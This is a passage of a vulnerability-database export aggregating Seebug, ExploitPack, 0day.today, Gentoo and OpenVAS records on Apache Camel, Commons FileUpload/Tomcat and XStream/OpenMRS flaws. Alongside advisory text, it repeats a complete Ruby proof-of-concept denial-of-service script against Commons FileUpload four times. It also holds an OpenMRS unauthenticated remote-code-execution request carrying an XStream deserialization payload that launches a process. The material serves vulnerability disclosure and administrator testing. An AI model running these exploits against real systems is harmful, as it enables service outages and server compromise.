"CVE(CAN) ID: CVE-2014-0002\r\n\r\nApache Camel is an open source integration framework based on known Enterprise Integration Patterns.\r\n\r\nThe XSLT component in Apache Camel 2.11.0-2.11.3 and Apache Camel 2.12.0-2.12.2 resolves entities in XML messages when transforming them with an xslt route. A remote attacker able to submit messages to an xslt route could use this flaw to read files accessible on the running application server and, possibly, perform other more advanced XXE attacks.\r\n0\r\nApache Group Camel < 2.12.3\r\nApache Group Camel < 2.11.4\r\nVendor patch:\r\n\r\nApache Group\r\n------------\r\nApache Group has released a security advisory (CVE-2014-0002) and a corresponding patch for this issue:\r\nCVE-2014-0002: CVE-2014-0002: Apache Camel critical disclosure vulnerability\r\nLink: http://camel.apache.org/security-advisories.data/CVE-2014-0002.txt.asc", "published": "2014-03-05T00:00:00", "title": "Apache Camel XSLT XML External Entity Vulnerability (CVE-2014-0002)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0002"], "modified": "2014-03-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61642", "id": "SSV:61642", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:32:27", "description": 
"BUGTRAQ ID: 65902\r\nCVE(CAN) ID: CVE-2014-0003\r\n\r\nApache Camel is an open source integration framework based on known Enterprise Integration Patterns.\r\n\r\nThe XSLT component in Apache Camel 2.11.0-2.11.3 and Apache Camel 2.12.0-2.12.2 allows XSL stylesheets to call external Java methods. A remote attacker able to submit messages to an xslt Camel route could use this flaw to execute arbitrary remote code in the context of the Camel server process.\r\n0\r\nApache Group Camel < 2.12.3\r\nApache Group Camel < 2.11.4\r\nVendor patch:\r\n\r\nApache Group\r\n------------\r\nApache Group has released a security advisory (CVE-2014-0003) and a corresponding patch for this issue:\r\nCVE-2014-0003: CVE-2014-0003: Apache Camel critical disclosure vulnerability\r\nLink: http://camel.apache.org/security-advisories.data/CVE-2014-0003.txt.asc", "published": "2014-03-04T00:00:00", "title": "Apache Camel Remote Code Execution Vulnerability (CVE-2014-0003)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0003"], "modified": "2014-03-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61629", "id": "SSV:61629", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T16:36:25", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-84935", "id": "SSV:84935", "sourceData": "\n #################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\r\n# This is a 
Proof of Concept code that was created for the sole purpose \t\t#\r\n# of assisting system administrators in evaluating whether their applications \t#\r\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#################################################################################\r\n\r\n\r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n\r\n\r\noptions = {}\r\n\r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"\r\n opt.separator ""\r\n opt.separator "Options"\r\n opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|\r\n options[:url] = url\r\n end\r\n\r\n opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n\r\n opt.on("-h","--help","help") do\r\n \tputs ""\r\n puts "#################################################################################"\r\n\tputs "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"\r\n\tputs "# #"\r\n\tputs "# Author: Oren Hafif, Trustwave SpiderLabs Research #"\r\n\tputs "# This is a Proof of Concept code that was created for the sole purpose #"\r\n\tputs "# of assisting system administrators in evaluating whether or not #"\r\n\tputs "# their applications are vulnerable to this issue. #"\r\n\tputs "# #"\r\n\tputs "# Please use responsibly. 
#"\r\n\tputs "#################################################################################"\r\n puts ""\r\n puts opt_parser\r\n puts ""\r\n \r\n\texit\r\n end\r\nend\r\n\r\nopt_parser.parse!\r\n\r\n\r\nuri = ""\r\nbegin\r\n\turi = URI.parse(options[:url])\r\nrescue Exception => e\r\n\tputs ""\r\n\tputs "ERROR: Invalid URL was entered #{options[:url]}"\r\n\tputs ""\r\n puts opt_parser\r\n exit\r\nend\r\n\r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n\tbegin\r\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\r\n\t\tthrow Exception.new if number_of_requests <= 0 \r\n\trescue Exception => e\r\n\t\tputs e\r\n\t\tputs ""\r\n\t\tputs "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"\r\n\t\tputs ""\r\n\t puts opt_parser\r\n\t exit\r\n\tend\r\nend\r\n\r\n#uri = URI.parse(uri)\r\n\r\n\r\nputs ""\r\nputs "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."\r\ni=10\r\ni.times { print "#{i.to_s}...";sleep 1; i-=1;}\r\nputs ""\r\n\r\n\r\nnumber_of_requests.times do \r\n\tbegin\r\n\tputs "Request Launched"\r\n\thttps = Net::HTTP.new(uri.host,uri.port)\r\n\thttps.use_ssl = uri.scheme=="https"\r\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n\treq = Net::HTTP::Post.new(uri.path)\r\n\treq.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")\r\n\treq.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")\r\n\treq.body = "b"*4097\r\n\thttps.read_timeout = 1 \r\n\tres = https.request(req)\r\n\trescue Timeout::Error=>e\r\n\t\tputs "Timeout - continuing DoS..."\r\n\trescue Exception=>e\r\n\t\tputs e.inspect\r\n\tend\r\nend\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-84935"}, {"lastseen": "2017-11-19T17:35:36", "description": "BUGTRAQ ID: 65400\r\nCVE(CAN) ID: CVE-2014-0050\r\n\r\nApache Commons 
FileUpload is a package that adds high-performance file upload capability to servlets and web applications. Apache Tomcat is a popular open-source JSP application server.\r\n\r\nApache Commons FileUpload has a vulnerability in parsing a malformed Content-Type header; using a specially crafted request, a remote attacker may be able to crash the program.\n0\nCommons FileUpload 1.0-1.3\r\nApache Tomcat 8.0.0-RC1-8.0.1\r\nApache Tomcat 7.0.0-7.0.50\r\nApache Tomcat 6\nVendor patch:\r\n\r\nApache\r\n-----\r\nUpgrade to Commons FileUpload 1.3.1, or Tomcat 8.0.2, 7.0.51 or later, to fix this vulnerability:\r\n\r\nhttp://commons.apache.org/", "published": "2014-02-13T00:00:00", "type": "seebug", "title": "Apache Commons FileUpload/Apache Tomcat denial of service vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61443", "id": "SSV:61443", "sourceData": "\n #################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\r\n# #\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research #\r\n# This is a Proof of Concept code that was created for the sole purpose #\r\n# of assisting system administrators in evaluating whether their applications #\r\n# are vulnerable to this issue or not #\r\n# #\r\n# Please use responsibly. 
#\r\n#################################################################################\r\n \r\n \r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n \r\n \r\noptions = {}\r\n \r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"\r\n opt.separator ""\r\n opt.separator "Options"\r\n opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|\r\n options[:url] = url\r\n end\r\n \r\n opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n \r\n opt.on("-h","--help","help") do\r\n puts ""\r\n puts "#################################################################################"\r\n puts "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"\r\n puts "# #"\r\n puts "# Author: Oren Hafif, Trustwave SpiderLabs Research #"\r\n puts "# This is a Proof of Concept code that was created for the sole purpose #"\r\n puts "# of assisting system administrators in evaluating whether or not #"\r\n puts "# their applications are vulnerable to this issue. #"\r\n puts "# #"\r\n puts "# Please use responsibly. 
#"\r\n puts "#################################################################################"\r\n puts ""\r\n puts opt_parser\r\n puts ""\r\n \r\n exit\r\n end\r\nend\r\n \r\nopt_parser.parse!\r\n \r\n \r\nuri = ""\r\nbegin\r\n uri = URI.parse(options[:url])\r\nrescue Exception => e\r\n puts ""\r\n puts "ERROR: Invalid URL was entered #{options[:url]}"\r\n puts ""\r\n puts opt_parser\r\n exit\r\nend\r\n \r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n begin\r\n number_of_requests = Integer( options[:number_of_requests] )\r\n throw Exception.new if number_of_requests <= 0\r\n rescue Exception => e\r\n puts e\r\n puts ""\r\n puts "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"\r\n puts ""\r\n puts opt_parser\r\n exit\r\n end\r\nend\r\n \r\n#uri = URI.parse(uri)\r\n \r\n \r\nputs ""\r\nputs "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."\r\ni=10\r\ni.times { print "#{i.to_s}...";sleep 1; i-=1;}\r\nputs ""\r\n \r\n \r\nnumber_of_requests.times do\r\n begin\r\n puts "Request Launched"\r\n https = Net::HTTP.new(uri.host,uri.port)\r\n https.use_ssl = uri.scheme=="https"\r\n https.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n req = Net::HTTP::Post.new(uri.path)\r\n req.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")\r\n req.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")\r\n req.body = "b"*4097\r\n https.read_timeout = 1\r\n res = https.request(req)\r\n rescue Timeout::Error=>e\r\n puts "Timeout - continuing DoS..."\r\n rescue Exception=>e\r\n puts e.inspect\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61443", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:38", "description": "\nOpenMRS Reporting Module 0.9.7 - Remote Code Execution", "edition": 1, "published": "2016-01-07T00:00:00", "title": "OpenMRS Reporting 
Module 0.9.7 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-7285"], "modified": "2016-01-07T00:00:00", "id": "EXPLOITPACK:868FED2D5F6215B2F39518F65E3C1404", "href": "", "sourceData": "Title: Unauthenticated remote code execution in OpenMRS\nProduct: OpenMRS\nVendor: OpenMRS Inc.\nTested versions: See summary\nStatus: Fixed by vendor\nReported by: Brian D. Hysell\n\nProduct description:\n\nOpenMRS is \"the world's leading open source enterprise electronic\nmedical record system platform.\"\n\nVulnerability summary:\n\nThe OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a\nversion of the XStream library vulnerable to CVE-2013-7285, making it\nvulnerable to remote code execution. If the Appointment Scheduling UI\nModule 1.0.3 is also installed, this RCE is accessible to\nunauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform\n1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3\ninstalled were confirmed to be vulnerable; other versions and\nconfigurations containing these modules are likely to be vulnerable as\nwell (see \"Remediation\").\n\nDetails:\n\nIn the Reporting module, the method saveSerializedDefinition (mapped\nto module/reporting/definition/saveSerializedDefinition) in\nInvalidSerializedDefinitionController can be accessed by an\nunauthenticated user.\n\nThe attacker must provide a valid UUID for a definition present in\nOpenMRS or a NullPointerException will be thrown before the remote\ncode execution can take place. 
However, upon initialization the\nAppointments Scheduling UI module inserts a definition with a constant\nUUID hard-coded into AppointmentSchedulingUIConstants\n(c1bf0730-e69e-11e3-ac10-0800200c9a66).\n\nProof of concept:\n\nGET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d\"java.beans.EventHandler\"><target%20class%3d\"java.lang.ProcessBuilder\"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject\n\nRemediation:\n\nThe vendor has addressed this issue in OpenMRS Standalone 2.3.1,\nOpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,\n1.10.3, and 1.9.10.\n\nTimeline:\n\nVendor contacted: November 2, 2015\nVendor replied: November 3\nCVE requested: November 14 (no response)\nPatch released: December 2\nAnnounced: January 6, 2016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache Commons FileUpload and Apache Tomcat - Denial of Service", "edition": 1, "published": "2014-02-12T00:00:00", "title": "Apache Commons FileUpload and Apache Tomcat - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "EXPLOITPACK:EB000848EE6583FA3B8F33FA4CDD34C0", "href": "", "sourceData": "#################################################################################\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\n# of 
assisting system administrators in evaluating whether their applications \t#\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n#################################################################################\n\n\nrequire 'net/http'\nrequire 'net/https'\nrequire 'optparse'\nrequire 'openssl'\n\n\noptions = {}\n\nopt_parser = OptionParser.new do |opt|\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\n opt.separator \"\"\n opt.separator \"Options\"\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\n options[:url] = url\n end\n\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\n options[:number_of_requests] = number_of_requests\n end\n\n opt.on(\"-h\",\"--help\",\"help\") do\n \tputs \"\"\n puts \"#################################################################################\"\n\tputs \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\n\tputs \"# #\"\n\tputs \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\n\tputs \"# This is a Proof of Concept code that was created for the sole purpose #\"\n\tputs \"# of assisting system administrators in evaluating whether or not #\"\n\tputs \"# their applications are vulnerable to this issue. #\"\n\tputs \"# #\"\n\tputs \"# Please use responsibly. 
#\"\n\tputs \"#################################################################################\"\n puts \"\"\n puts opt_parser\n puts \"\"\n \n\texit\n end\nend\n\nopt_parser.parse!\n\n\nuri = \"\"\nbegin\n\turi = URI.parse(options[:url])\nrescue Exception => e\n\tputs \"\"\n\tputs \"ERROR: Invalid URL was entered #{options[:url]}\"\n\tputs \"\"\n puts opt_parser\n exit\nend\n\nnumber_of_requests = 10;\nif(options[:number_of_requests] != nil)\n\tbegin\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\n\t\tthrow Exception.new if number_of_requests <= 0 \n\trescue Exception => e\n\t\tputs e\n\t\tputs \"\"\n\t\tputs \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\n\t\tputs \"\"\n\t puts opt_parser\n\t exit\n\tend\nend\n\n#uri = URI.parse(uri)\n\n\nputs \"\"\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\ni=10\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\nputs \"\"\n\n\nnumber_of_requests.times do \n\tbegin\n\tputs \"Request Launched\"\n\thttps = Net::HTTP.new(uri.host,uri.port)\n\thttps.use_ssl = uri.scheme==\"https\"\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\n\treq = Net::HTTP::Post.new(uri.path)\n\treq.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\n\treq.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\n\treq.body = \"b\"*4097\n\thttps.read_timeout = 1 \n\tres = https.request(req)\n\trescue Timeout::Error=>e\n\t\tputs \"Timeout - continuing DoS...\"\n\trescue Exception=>e\n\t\tputs e.inspect\n\tend\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-12-13T09:58:27", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "edition": 1, "description": "### Background\n\nXStream is a simple library to serialize objects to XML and back again.\n\n### Description\n\nIt was found that XStream would deserialize arbitrary user-supplied XML content, thus 
representing objects of any type. \n\n### Impact\n\nA remote attacker could pass a specially crafted XML document to XStream, possibly resulting in the execution of arbitrary code with the privileges of the process or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll XStream users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/xstream-1.4.8-r1\"", "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "href": "https://security.gentoo.org/glsa/201612-35", "id": "GLSA-201612-35", "title": "XStream: Remote execution of arbitrary code", "type": "gentoo", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-06T03:36:33", "description": "Exploit for java platform in category web applications", "edition": 2, "published": "2016-01-07T00:00:00", "type": "zdt", "title": "OpenMRS Reporting Module 0.9.7 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-7285"], "modified": "2016-01-07T00:00:00", "id": "1337DAY-ID-24847", "href": "https://0day.today/exploit/description/24847", "sourceData": "Title: Unauthenticated remote code execution in OpenMRS\r\nProduct: OpenMRS\r\nVendor: OpenMRS Inc.\r\nTested versions: See summary\r\nStatus: Fixed by vendor\r\nReported by: Brian D. Hysell\r\n \r\nProduct description:\r\n \r\nOpenMRS is \"the world's leading open source enterprise electronic\r\nmedical record system platform.\"\r\n \r\nVulnerability summary:\r\n \r\nThe OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a\r\nversion of the XStream library vulnerable to CVE-2013-7285, making it\r\nvulnerable to remote code execution. If the Appointment Scheduling UI\r\nModule 1.0.3 is also installed, this RCE is accessible to\r\nunauthenticated attackers. 
OpenMRS Standalone 2.3 and OpenMRS Platform\r\n1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3\r\ninstalled were confirmed to be vulnerable; other versions and\r\nconfigurations containing these modules are likely to be vulnerable as\r\nwell (see \"Remediation\").\r\n \r\nDetails:\r\n \r\nIn the Reporting module, the method saveSerializedDefinition (mapped\r\nto module/reporting/definition/saveSerializedDefinition) in\r\nInvalidSerializedDefinitionController can be accessed by an\r\nunauthenticated user.\r\n \r\nThe attacker must provide a valid UUID for a definition present in\r\nOpenMRS or a NullPointerException will be thrown before the remote\r\ncode execution can take place. However, upon initialization the\r\nAppointments Scheduling UI module inserts a definition with a constant\r\nUUID hard-coded into AppointmentSchedulingUIConstants\r\n(c1bf0730-e69e-11e3-ac10-0800200c9a66).\r\n \r\nProof of concept:\r\n \r\nGET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d\"java.beans.EventHandler\"><target%20class%3d\"java.lang.ProcessBuilder\"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject\r\n \r\nRemediation:\r\n \r\nThe vendor has addressed this issue in OpenMRS Standalone 2.3.1,\r\nOpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,\r\n1.10.3, and 1.9.10.\r\n \r\nTimeline:\r\n \r\nVendor contacted: November 2, 2015\r\nVendor replied: November 3\r\nCVE requested: November 14 (no response)\r\nPatch released: December 2\r\nAnnounced: January 6, 2016\n\n# 0day.today [2018-04-06] #", "cvss": {"score": 5.5, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24847"}, {"lastseen": "2018-01-04T07:03:17", "description": "Exploit for multiple platform in category dos / poc", "edition": 2, "published": "2014-02-12T00:00:00", "type": "zdt", "title": "Apache Commons FileUpload and Apache Tomcat Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "1337DAY-ID-21887", "href": "https://0day.today/exploit/description/21887", "sourceData": "#################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\r\n# #\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research #\r\n# This is a Proof of Concept code that was created for the sole purpose #\r\n# of assisting system administrators in evaluating whether their applications #\r\n# are vulnerable to this issue or not #\r\n# #\r\n# Please use responsibly. #\r\n#################################################################################\r\n \r\n \r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n \r\n \r\noptions = {}\r\n \r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\r\n opt.separator \"\"\r\n opt.separator \"Options\"\r\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\r\n options[:url] = url\r\n end\r\n \r\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. 
The default value is 10\") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n \r\n opt.on(\"-h\",\"--help\",\"help\") do\r\n puts \"\"\r\n puts \"#################################################################################\"\r\n puts \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\r\n puts \"# #\"\r\n puts \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\r\n puts \"# This is a Proof of Concept code that was created for the sole purpose #\"\r\n puts \"# of assisting system administrators in evaluating whether or not #\"\r\n puts \"# their applications are vulnerable to this issue. #\"\r\n puts \"# #\"\r\n puts \"# Please use responsibly. #\"\r\n puts \"#################################################################################\"\r\n puts \"\"\r\n puts opt_parser\r\n puts \"\"\r\n \r\n exit\r\n end\r\nend\r\n \r\nopt_parser.parse!\r\n \r\n \r\nuri = \"\"\r\nbegin\r\n uri = URI.parse(options[:url])\r\nrescue Exception => e\r\n puts \"\"\r\n puts \"ERROR: Invalid URL was entered #{options[:url]}\"\r\n puts \"\"\r\n puts opt_parser\r\n exit\r\nend\r\n \r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n begin\r\n number_of_requests = Integer( options[:number_of_requests] )\r\n throw Exception.new if number_of_requests <= 0\r\n rescue Exception => e\r\n puts e\r\n puts \"\"\r\n puts \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\r\n puts \"\"\r\n puts opt_parser\r\n exit\r\n end\r\nend\r\n \r\n#uri = URI.parse(uri)\r\n \r\n \r\nputs \"\"\r\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\r\ni=10\r\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\r\nputs \"\"\r\n \r\n \r\nnumber_of_requests.times do\r\n begin\r\n puts \"Request Launched\"\r\n https = Net::HTTP.new(uri.host,uri.port)\r\n https.use_ssl = uri.scheme==\"https\"\r\n https.verify_mode = 
OpenSSL::SSL::VERIFY_NONE\r\n req = Net::HTTP::Post.new(uri.path)\r\n req.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\r\n req.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\r\n req.body = \"b\"*4097\r\n https.read_timeout = 1\r\n res = https.request(req)\r\n rescue Timeout::Error=>e\r\n puts \"Timeout - continuing DoS...\"\r\n rescue Exception=>e\r\n puts e.inspect\r\n end\r\nend\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21887"}], "openvas": [{"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:1361412562310867530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867530", "type": "openvas", "title": "Fedora Update for xstream FEDORA-2014-2340", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xstream FEDORA-2014-2340\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867530\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:08:23 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-7285\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for xstream FEDORA-2014-2340\");\n script_tag(name:\"affected\", value:\"xstream on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2340\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128864.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xstream'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = 
